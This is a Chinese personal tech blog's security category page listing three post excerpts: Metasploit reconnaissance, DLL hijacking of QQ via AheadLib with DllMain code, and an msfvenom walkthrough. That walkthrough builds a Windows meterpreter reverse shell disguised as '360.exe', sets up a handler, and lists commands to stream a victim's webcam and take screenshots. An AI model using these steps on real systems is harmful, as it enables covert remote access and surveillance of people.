首页
关于
统计
友链
推荐
百度一下
腾讯视频
幻鹤主页
Search
1
使用AheadLib工具进行劫持DLL操作
2,832 阅读
2
数据库的关联查询
1,866 阅读
3
遇到闪照想保存?教你骚操作保存闪照
1,832 阅读
4
教大家“调教”应急食品
1,758 阅读
5
MySql的增删改查的练习
1,611 阅读
技术分享
Python
PHP
其他
网络安全
Java
JavaScript
生活趣闻
语言的魅力
作者的牢骚
登录
Search
标签搜索
mysql
kali
docker
dll
入门
MSF
网络安全
Huan-He
累计撰写
23
篇文章
累计收到
65
条评论
首页
栏目
技术分享
Python
PHP
其他
网络安全
Java
JavaScript
生活趣闻
语言的魅力
作者的牢骚
页面
关于
统计
友链
推荐
百度一下
腾讯视频
幻鹤主页
搜索到
3
篇与
网络安全
的结果
2023-03-05
基于Metasploit模块的信息搜集
本文介绍了如何使用Metasploit框架中的不同模块,基于TCP、SMB、SSH、FTP等协议,进行信息收集,帮助你进行网络安全渗透测试。
2023年03月05日
1,277 阅读
0 评论
0 点赞
2022-07-09
使用AheadLib工具进行劫持DLL操作
也许您听说过 DLL 劫持技术,但您还没有尝试过 DLL 劫持技术。 DLL劫持技术的原理是:由于输入表只包含 DLL 名称而不包含其路径名,加载程序必须在磁盘上搜索 DLL 文件。首先,它会尝试从当前程序所在的目录加载 DLL。如果没有找到,则在Windows系统目录中查找,最后在环境变量中列出的每个目录中查找。利用这个特性,首先伪造一个与系统同名的DLL,提供相同的输出表,每个输出函数都转为真正的系统DLL。程序调用系统DLL时,会先调用当前目录下的假DLL,完成相关功能后,会跳转到与系统DLL同名的函数处执行。这个过程用系统DLL被劫持的形象来描述观察导入的DLL,如KERNEL32.DLL、USER32.DLL等受系统保护的重要DLL,比较难劫持,所以我们选择VERSION.DLL。至于判断是否是系统保护的DLL,可以查看注册表中的key值。里面的DLL受系统保护,加载路径是固定的:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\knowndlls编码实现现在,我给出入口点的version.dll劫持部分的代码,其余代码使用AheadLib工具生成,我只是在入口点处为弹窗添加了一行代码。 // 入口函数 BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); ::MessageBox(NULL, "I am Demon", "CDIY", MB_OK); return Load(); } else if (dwReason == DLL_PROCESS_DETACH) { Free(); } return TRUE; }qq的劫持dll选用{callout color="#f0ad4e"}libuv.dll{/callout}新建一个vs dll项目,然后将.cpp的代码复制进去,并加上<windows.h>和<stdlib.h>头文件然后在入口函数的地方填上一个弹出计算器的语句将原dll文件改名为之前在软件里面复制的名字libuvOrg.dll,并把我们生成的dll文件复制进去点击QQ.exe即可弹出calc.exe
2022年07月09日
2,832 阅读
13 评论
0 点赞
2022-03-19
kali系统的msfconsole使用,脚本小子
msfconsole的脚本很好用的生成脚本msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.128 lport=10000 -f exe -o 360.exe添加脚本监控1:打开msf msfconsole2:添加新监控 use exploit/multi/handler3:配置监控信息 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.247.128 set lport 100004:运行程序 run{lamp/}下面是msf的一些基础工具1:查看设备摄像头列表 webcam_list2:打开摄像头监控 webcam_stream3:拍一张照片 webcam_snap4:截屏 screenshot5:查看脚本运行目录 pwd好了结束了!
2022年03月19日
1,149 阅读
0 评论
0 点赞